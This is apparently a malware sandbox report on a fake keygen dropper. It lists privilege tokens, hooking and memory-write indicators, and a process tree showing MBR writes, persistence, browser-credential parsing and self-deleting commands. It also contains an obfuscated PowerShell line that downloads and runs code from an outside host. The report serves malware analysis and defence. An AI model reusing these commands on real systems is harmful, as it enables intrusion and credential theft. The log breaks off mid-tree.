Token: SeTcbPrivilege	2916	msiexec.exe
Token: SeSecurityPrivilege	2916	msiexec.exe
Token: SeTakeOwnershipPrivilege	2916	msiexec.exe
Token: SeLoadDriverPrivilege	2916	msiexec.exe
Token: SeSystemProfilePrivilege	2916	msiexec.exe
Token: SeSystemtimePrivilege	2916	msiexec.exe
Token: SeProfSingleProcessPrivilege	2916	msiexec.exe
Token: SeIncBasePriorityPrivilege	2916	msiexec.exe
Token: SeCreatePagefilePrivilege	2916	msiexec.exe
Token: SeCreatePermanentPrivilege	2916	msiexec.exe
Token: SeBackupPrivilege	2916	msiexec.exe
Token: SeRestorePrivilege	2916	msiexec.exe
Token: SeShutdownPrivilege	2916	msiexec.exe
Token: SeDebugPrivilege	2916	msiexec.exe
Token: SeAuditPrivilege	2916	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2916	msiexec.exe
Token: SeChangeNotifyPrivilege	2916	msiexec.exe
Token: SeRemoteShutdownPrivilege	2916	msiexec.exe
Token: SeUndockPrivilege	2916	msiexec.exe
Token: SeSyncAgentPrivilege	2916	msiexec.exe
Token: SeEnableDelegationPrivilege	2916	msiexec.exe
Token: SeManageVolumePrivilege	2916	msiexec.exe
Token: SeImpersonatePrivilege	2916	msiexec.exe
Token: SeCreateGlobalPrivilege	2916	msiexec.exe
Token: SeCreateTokenPrivilege	2916	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2916	msiexec.exe
Token: SeLockMemoryPrivilege	2916	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2916	msiexec.exe
Token: SeMachineAccountPrivilege	2916	msiexec.exe
Token: SeTcbPrivilege	2916	msiexec.exe
Token: SeSecurityPrivilege	2916	msiexec.exe
Token: SeTakeOwnershipPrivilege	2916	msiexec.exe
Token: SeLoadDriverPrivilege	2916	msiexec.exe
Token: SeSystemProfilePrivilege	2916	msiexec.exe
Token: SeSystemtimePrivilege	2916	msiexec.exe
Token: SeProfSingleProcessPrivilege	2916	msiexec.exe
Token: SeIncBasePriorityPrivilege	2916	msiexec.exe
Token: SeCreatePagefilePrivilege	2916	msiexec.exe
Token: SeCreatePermanentPrivilege	2916	msiexec.exe
Token: SeBackupPrivilege	2916	msiexec.exe
Token: SeRestorePrivilege	2916	msiexec.exe
Token: SeShutdownPrivilege	2916	msiexec.exe
Token: SeDebugPrivilege	2916	msiexec.exe
Token: SeAuditPrivilege	2916	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2916	msiexec.exe
Token: SeChangeNotifyPrivilege	2916	msiexec.exe
Token: SeRemoteShutdownPrivilege	2916	msiexec.exe
Token: SeUndockPrivilege	2916	msiexec.exe
Token: SeSyncAgentPrivilege	2916	msiexec.exe
Token: SeEnableDelegationPrivilege	2916	msiexec.exe
Token: SeManageVolumePrivilege	2916	msiexec.exe
Token: SeImpersonatePrivilege	2916	msiexec.exe
Token: SeCreateGlobalPrivilege	2916	msiexec.exe
Token: SeCreateTokenPrivilege	2916	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2916	msiexec.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

msiexec.exe

pid	Process
2916	msiexec.exe

Suspicious use of SetWindowsHookEx 14 IoCs

Processes:

Setup.exeC0CA61A12E4C8B38.exeC0CA61A12E4C8B38.exewmiprvse.exe1615014376668.exefirefox.exe1615014381668.exefirefox.exe1615014387293.exe2cyz23u2nve.exesafebits.exeaskinstall24.exevict.exe2cyz23u2nve.tmp

pid	Process
400	Setup.exe
904	C0CA61A12E4C8B38.exe
3900	C0CA61A12E4C8B38.exe
1924	wmiprvse.exe
3876	1615014376668.exe
5092	firefox.exe
1000	1615014381668.exe
4940	firefox.exe
5016	1615014387293.exe
4476	2cyz23u2nve.exe
4376	safebits.exe
4496	askinstall24.exe
4560	vict.exe
4576	2cyz23u2nve.tmp

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

keygen-step-4.exefile.exe615F.tmp.execmd.exeSetup.exemsiexec.execmd.exeInstall.exeaskinstall20.exeC0CA61A12E4C8B38.exeC0CA61A12E4C8B38.exe

description	pid	Process	procid_target
PID 1112 wrote to memory of 3224	1112	keygen-step-4.exe	75
PID 1112 wrote to memory of 3224	1112	keygen-step-4.exe	75
PID 1112 wrote to memory of 3224	1112	keygen-step-4.exe	75
PID 3224 wrote to memory of 2096	3224	file.exe	78
PID 3224 wrote to memory of 2096	3224	file.exe	78
PID 3224 wrote to memory of 2096	3224	file.exe	78
PID 2096 wrote to memory of 4000	2096	615F.tmp.exe	82
PID 2096 wrote to memory of 4000	2096	615F.tmp.exe	82
PID 2096 wrote to memory of 4000	2096	615F.tmp.exe	82
PID 2096 wrote to memory of 4000	2096	615F.tmp.exe	82
PID 2096 wrote to memory of 4000	2096	615F.tmp.exe	82
PID 2096 wrote to memory of 4000	2096	615F.tmp.exe	82
PID 2096 wrote to memory of 4000	2096	615F.tmp.exe	82
PID 2096 wrote to memory of 4000	2096	615F.tmp.exe	82
PID 2096 wrote to memory of 4000	2096	615F.tmp.exe	82
PID 2096 wrote to memory of 4000	2096	615F.tmp.exe	82
PID 2096 wrote to memory of 4000	2096	615F.tmp.exe	82
PID 2096 wrote to memory of 4000	2096	615F.tmp.exe	82
PID 2096 wrote to memory of 4000	2096	615F.tmp.exe	82
PID 3224 wrote to memory of 992	3224	file.exe	83
PID 3224 wrote to memory of 992	3224	file.exe	83
PID 3224 wrote to memory of 992	3224	file.exe	83
PID 1112 wrote to memory of 400	1112	keygen-step-4.exe	85
PID 1112 wrote to memory of 400	1112	keygen-step-4.exe	85
PID 1112 wrote to memory of 400	1112	keygen-step-4.exe	85
PID 992 wrote to memory of 3236	992	cmd.exe	86
PID 992 wrote to memory of 3236	992	cmd.exe	86
PID 992 wrote to memory of 3236	992	cmd.exe	86
PID 400 wrote to memory of 2916	400	Setup.exe	87
PID 400 wrote to memory of 2916	400	Setup.exe	87
PID 400 wrote to memory of 2916	400	Setup.exe	87
PID 512 wrote to memory of 3616	512	msiexec.exe	89
PID 512 wrote to memory of 3616	512	msiexec.exe	89
PID 512 wrote to memory of 3616	512	msiexec.exe	89
PID 400 wrote to memory of 904	400	Setup.exe	90
PID 400 wrote to memory of 904	400	Setup.exe	90
PID 400 wrote to memory of 904	400	Setup.exe	90
PID 400 wrote to memory of 3900	400	Setup.exe	91
PID 400 wrote to memory of 3900	400	Setup.exe	91
PID 400 wrote to memory of 3900	400	Setup.exe	91
PID 400 wrote to memory of 2232	400	Setup.exe	92
PID 400 wrote to memory of 2232	400	Setup.exe	92
PID 400 wrote to memory of 2232	400	Setup.exe	92
PID 1112 wrote to memory of 3636	1112	keygen-step-4.exe	93
PID 1112 wrote to memory of 3636	1112	keygen-step-4.exe	93
PID 2232 wrote to memory of 1464	2232	cmd.exe	95
PID 2232 wrote to memory of 1464	2232	cmd.exe	95
PID 2232 wrote to memory of 1464	2232	cmd.exe	95
PID 3636 wrote to memory of 8	3636	Install.exe	96
PID 3636 wrote to memory of 8	3636	Install.exe	96
PID 1112 wrote to memory of 892	1112	keygen-step-4.exe	97
PID 1112 wrote to memory of 892	1112	keygen-step-4.exe	97
PID 1112 wrote to memory of 892	1112	keygen-step-4.exe	97
PID 892 wrote to memory of 1516	892	askinstall20.exe	98
PID 892 wrote to memory of 1516	892	askinstall20.exe	98
PID 892 wrote to memory of 1516	892	askinstall20.exe	98
PID 904 wrote to memory of 1924	904	C0CA61A12E4C8B38.exe	106
PID 904 wrote to memory of 1924	904	C0CA61A12E4C8B38.exe	106
PID 3900 wrote to memory of 208	3900	C0CA61A12E4C8B38.exe	101
PID 3900 wrote to memory of 208	3900	C0CA61A12E4C8B38.exe	101
PID 3900 wrote to memory of 208	3900	C0CA61A12E4C8B38.exe	101
PID 904 wrote to memory of 1924	904	C0CA61A12E4C8B38.exe	106
PID 904 wrote to memory of 1924	904	C0CA61A12E4C8B38.exe	106
PID 904 wrote to memory of 1924	904	C0CA61A12E4C8B38.exe	106

C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1112
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe"
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Modifies system certificate store
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3224
- - C:\Users\Admin\AppData\Roaming\615F.tmp.exe
    "C:\Users\Admin\AppData\Roaming\615F.tmp.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:2096
  - - C:\Users\Admin\AppData\Roaming\615F.tmp.exe
      "C:\Users\Admin\AppData\Roaming\615F.tmp.exe"
      4⤵
      Executes dropped EXE
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      PID:4000
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:992
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.1
      4⤵
      Runs ping.exe
      PID:3236
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe"
  2⤵
  - Executes dropped EXE
  - Writes to the Master Boot Record (MBR)
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Modifies system certificate store
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:400
- - C:\Windows\SysWOW64\msiexec.exe
    msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
    3⤵
    - Enumerates connected drives
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    PID:2916
- - C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe
    C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe 0011 installp1
    3⤵
    - Executes dropped EXE
    - Writes to the Master Boot Record (MBR)
    - Suspicious use of SetThreadContext
    - Checks SCSI registry key(s)
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:904
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe"
      4⤵
      PID:1924
  - - C:\Users\Admin\AppData\Roaming\1615014376668.exe
      "C:\Users\Admin\AppData\Roaming\1615014376668.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615014376668.txt"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of SetWindowsHookEx
      PID:3876
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe"
      4⤵
      Suspicious use of SetWindowsHookEx
      PID:5092
  - - C:\Users\Admin\AppData\Roaming\1615014381668.exe
      "C:\Users\Admin\AppData\Roaming\1615014381668.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615014381668.txt"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of SetWindowsHookEx
      PID:1000
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe"
      4⤵
      Suspicious use of SetWindowsHookEx
      PID:4940
  - - C:\Users\Admin\AppData\Roaming\1615014387293.exe
      "C:\Users\Admin\AppData\Roaming\1615014387293.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615014387293.txt"
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:5016
  - - C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe
      C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"
      4⤵
      PID:6108
  - - C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe
      "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP
      4⤵
      PID:5892
- - C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe
    C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe 200 installp1
    3⤵
    - Executes dropped EXE
    - Writes to the Master Boot Record (MBR)
    - Checks SCSI registry key(s)
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:3900
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c taskkill /f /im chrome.exe
      4⤵
      PID:208
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        5⤵
        Kills process with taskkill
        
        PID:2148
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe"
      4⤵
      PID:4236
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 3
        5⤵
        Runs ping.exe
        
        PID:4332
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2232
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.1 -n 3
      4⤵
      Runs ping.exe
      PID:1464
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3636
- - C:\Users\Admin\AppData\Local\Temp\33N4J37VE0\multitimer.exe
    "C:\Users\Admin\AppData\Local\Temp\33N4J37VE0\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    PID:8
  - - C:\Users\Admin\AppData\Local\Temp\33N4J37VE0\multitimer.exe
      "C:\Users\Admin\AppData\Local\Temp\33N4J37VE0\multitimer.exe" 1 3.1615014596.60432ac408364 101
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      PID:5008
    - - C:\Users\Admin\AppData\Local\Temp\33N4J37VE0\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\33N4J37VE0\multitimer.exe" 2 3.1615014596.60432ac408364
        5⤵
        Executes dropped EXE
        Checks for any installed AV software in registry
        Maps connected drives based on registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:3636
      - C:\Users\Admin\AppData\Local\Temp\esj4ltpgxsp\askinstall24.exe
        
        "C:\Users\Admin\AppData\Local\Temp\esj4ltpgxsp\askinstall24.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4496
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        7⤵
        
        PID:5068
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        8⤵
        Kills process with taskkill
        
        PID:5728
      - C:\Users\Admin\AppData\Local\Temp\modbbwnrrkj\2cyz23u2nve.exe
        
        "C:\Users\Admin\AppData\Local\Temp\modbbwnrrkj\2cyz23u2nve.exe" /VERYSILENT
        6⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4476
        
        C:\Users\Admin\AppData\Local\Temp\is-H6MEA.tmp\2cyz23u2nve.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-H6MEA.tmp\2cyz23u2nve.tmp" /SL5="$1022C,870426,780800,C:\Users\Admin\AppData\Local\Temp\modbbwnrrkj\2cyz23u2nve.exe" /VERYSILENT
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:4576
        
        C:\Users\Admin\AppData\Local\Temp\is-20QTQ.tmp\winlthst.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-20QTQ.tmp\winlthst.exe" test1 test1
        8⤵
        
        PID:4652
        
        C:\Users\Admin\AppData\Local\Temp\rj16ngkaM.exe
        
        "C:\Users\Admin\AppData\Local\Temp\rj16ngkaM.exe"
        9⤵
        
        PID:6152
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im rj16ngkaM.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\rj16ngkaM.exe" & del C:\ProgramData\*.dll & exit
        10⤵
        
        PID:4844
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im rj16ngkaM.exe /f
        11⤵
        Kills process with taskkill
        
        PID:5772
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        11⤵
        Delays execution with timeout.exe
        
        PID:4388
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        9⤵
        
        PID:5152
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        10⤵
        
        PID:2316
      - C:\Users\Admin\AppData\Local\Temp\3uzke3tw4qu\g3zc0niealn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3uzke3tw4qu\g3zc0niealn.exe" /ustwo INSTALL
        6⤵
        Executes dropped EXE
        
        PID:4644
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4644 -s 664
        7⤵
        Program crash
        
        PID:6048
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4644 -s 652
        7⤵
        Program crash
        
        PID:4436
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4644 -s 724
        7⤵
        Program crash
        
        PID:4548
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4644 -s 820
        7⤵
        Program crash
        
        PID:3932
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4644 -s 884
        7⤵
        Program crash
        
        PID:5992
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4644 -s 940
        7⤵
        Program crash
        
        PID:6440
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4644 -s 1088
        7⤵
        Program crash
        
        PID:6608
      - C:\Users\Admin\AppData\Local\Temp\pla3urhgcuu\qpj44iwqp05.exe
        
        "C:\Users\Admin\AppData\Local\Temp\pla3urhgcuu\qpj44iwqp05.exe" 57a764d042bf8
        6⤵
        
        PID:4716
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k "C:\Program Files\IEY2T8DN2G\IEY2T8DN2.exe" 57a764d042bf8 & exit
        7⤵
        
        PID:4160
        
        C:\Program Files\IEY2T8DN2G\IEY2T8DN2.exe
        
        "C:\Program Files\IEY2T8DN2G\IEY2T8DN2.exe" 57a764d042bf8
        8⤵
        
        PID:5416
      - C:\Users\Admin\AppData\Local\Temp\rc2rfzdjvtk\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\rc2rfzdjvtk\Setup3310.exe" /Verysilent /subid=577
        6⤵
        
        PID:4996
        
        C:\Users\Admin\AppData\Local\Temp\is-P9MJT.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-P9MJT.tmp\Setup3310.tmp" /SL5="$2024E,802346,56832,C:\Users\Admin\AppData\Local\Temp\rc2rfzdjvtk\Setup3310.exe" /Verysilent /subid=577
        7⤵
        
        PID:4832
        
        C:\Users\Admin\AppData\Local\Temp\is-GS6I6.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-GS6I6.tmp\Setup.exe" /Verysilent
        8⤵
        
        PID:4664
        
        C:\Users\Admin\AppData\Local\Temp\is-JV7EI.tmp\Setup.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-JV7EI.tmp\Setup.tmp" /SL5="$202FE,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-GS6I6.tmp\Setup.exe" /Verysilent
        9⤵
        
        PID:1796
        
        C:\Users\Admin\AppData\Local\Temp\is-BDF4Q.tmp\ProPlugin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-BDF4Q.tmp\ProPlugin.exe" /Verysilent
        10⤵
        
        PID:6388
        
        C:\Users\Admin\AppData\Local\Temp\is-PLSBJ.tmp\ProPlugin.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-PLSBJ.tmp\ProPlugin.tmp" /SL5="$3030C,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-BDF4Q.tmp\ProPlugin.exe" /Verysilent
        11⤵
        
        PID:6408
        
        C:\Users\Admin\AppData\Local\Temp\is-TGUSQ.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-TGUSQ.tmp\Setup.exe"
        12⤵
        
        PID:6928
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"
        13⤵
        
        PID:6988
        
        C:\Windows\regedit.exe
        
        regedit /s chrome.reg
        14⤵
        Runs .reg file with regedit
        
        PID:5744
        
        C:\Windows\SYSTEM32\TASKKILL.exe
        
        TASKKILL /F /IM chrome.exe
        14⤵
        Kills process with taskkill
        
        PID:5916
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chrome64.bat
        14⤵
        
        PID:4384
        
        C:\Windows\system32\mshta.exe
        
        mshta vbscript:createobject("wscript.shell").run("chrome64.bat h",0)(window.close)
        15⤵
        
        PID:6572
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX1\chrome64.bat" h"
        16⤵
        
        PID:6696
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:/Program Files/Google/Chrome/Application/chrome.exe"
        17⤵
        
        PID:6300
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffc48056e00,0x7ffc48056e10,0x7ffc48056e20
        18⤵
        
        PID:5084
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1652,18117905732818778682,1514711997518928260,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1712 /prefetch:8
        18⤵
        
        PID:5316
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1652,18117905732818778682,1514711997518928260,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1664 /prefetch:2
        18⤵
        
        PID:2228
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,18117905732818778682,1514711997518928260,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2660 /prefetch:1
        18⤵
        
        PID:4704
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,18117905732818778682,1514711997518928260,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2652 /prefetch:1
        18⤵
        
        PID:668
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,18117905732818778682,1514711997518928260,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
        18⤵
        
        PID:6592
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,18117905732818778682,1514711997518928260,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:1
        18⤵
        
        PID:6780
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,18117905732818778682,1514711997518928260,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3532 /prefetch:1
        18⤵
        
        PID:6112
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,18117905732818778682,1514711997518928260,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3652 /prefetch:1
        18⤵
        
        PID:5756
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,18117905732818778682,1514711997518928260,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4152 /prefetch:8
        18⤵
        
        PID:5428
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,18117905732818778682,1514711997518928260,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3936 /prefetch:8
        18⤵
        
        PID:2520
        
        C:\Windows\regedit.exe
        
        regedit /s chrome-set.reg
        14⤵
        Runs .reg file with regedit
        
        PID:6552
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
        
        parse.exe -f json -b firefox
        14⤵
        
        PID:5800
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
        
        parse.exe -f json -b chrome
        14⤵
        
        PID:4764
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
        
        parse.exe -f json -b edge
        14⤵
        
        PID:5872
        
        C:\Users\Admin\AppData\Local\Temp\is-BDF4Q.tmp\PictureLAb.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-BDF4Q.tmp\PictureLAb.exe" /Verysilent
        10⤵
        
        PID:5896
        
        C:\Users\Admin\AppData\Local\Temp\is-BNCC1.tmp\PictureLAb.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-BNCC1.tmp\PictureLAb.tmp" /SL5="$4030C,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-BDF4Q.tmp\PictureLAb.exe" /Verysilent
        11⤵
        
        PID:2876
        
        C:\Users\Admin\AppData\Local\Temp\is-8M63E.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-8M63E.tmp\Setup.exe" /VERYSILENT
        12⤵
        
        PID:3232
        
        C:\Users\Admin\AppData\Local\Temp\is-1MLAP.tmp\Setup.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-1MLAP.tmp\Setup.tmp" /SL5="$30440,442598,358912,C:\Users\Admin\AppData\Local\Temp\is-8M63E.tmp\Setup.exe" /VERYSILENT
        13⤵
        
        PID:4568
        
        C:\Users\Admin\AppData\Local\Temp\is-14QQQ.tmp\kkkk.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-14QQQ.tmp\kkkk.exe" /S /UID=lab214
        14⤵
        
        PID:4724
        
        C:\Users\Admin\AppData\Local\Temp\AKYAMOCSPU\prolab.exe
        
